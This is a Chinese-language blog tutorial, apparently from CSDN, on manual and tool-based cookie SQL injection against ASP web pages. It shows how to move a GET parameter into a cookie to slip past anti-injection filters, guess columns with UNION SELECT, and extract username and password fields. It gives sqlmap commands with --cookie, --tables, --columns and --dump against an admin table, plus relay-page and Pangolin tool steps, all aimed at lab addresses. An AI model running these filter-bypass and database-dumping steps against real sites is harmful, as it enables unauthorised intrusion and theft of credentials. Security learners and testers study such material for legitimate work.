Cookie手工实战注入

Cookie手工实战注入


注入分为:GET 、POST、COOKIE 注入,当一个站增加了防注入程序之后,
很多朋友都会放弃,其实大家可以试试 COOKIE 注入

先回顾一下 ASP 和 PHP 数据提交方式

		ASP
			request (全部接受)
			request.querystring (接受 get)
			request.form (接受 post)
			request.cookie(接受 cookie) 
		PHP
			$_REQUEST(全部接受)
			$_GET(接受get)
			$_POST (接受 post)
			$_COOKIE(接受 cookie) 

实际操作

	通过 burp 抓包分析http://192.168.1.113:999/productshow.asp?id=59
		发现 GET 、POST 方式注入都被过滤掉,把 GET 改成 COOKICE注入没有被过滤。
			把GET中 ?后面的参数放到cookice中注入
				检测加单引号看输出长度是否变化
					使用unicon secelet 1-20,猜测字段数目
						将可输出的对应数字改为username password

Cookie中转及工具注入

通过注入中转器工具cookie注入

填写信息 进行生成页面 通过get方法实现cookices 注入
	只针对asp
		最后访问生成出来的 jmcook.asp 文件,记得文件后面接上工具 POST 提交值这栏的参数,
		最终打开的地址为:http://localhost:4086/jmCook.asp?jmdcw=58

穿山甲如何cookie注入

	选定cookie类型即可

通过 sqlmap 来实现 cookie 注入

	D:\VStart50\tools\注入检测\sqlmap>sqlmap.py -u "http://172.16.24.188/productshow.asp" --cookie "id=58" --level 2(level默认1)
		末尾加--tables可以查看有哪些表
		加--columns -T +表名查看字段
		 --dump -C "username,password" -T admin
			脱库
	补充
		如果post注入
			D:\VStart50\tools\注入检测\sqlmap>sqlmap.py -u "http://172.16.24.188/productshow.asp" --data "id=58" 
		get 注入
			D:\VStart50\tools\注入检测\sqlmap>sqlmap.py -u"http://172.16.24.188/productshow.asp id=58" 
发布了63 篇原创文章 · 获赞 8 · 访问量 2504

猜你喜欢

转载自blog.csdn.net/weixin_43079958/article/details/105312255
今日推荐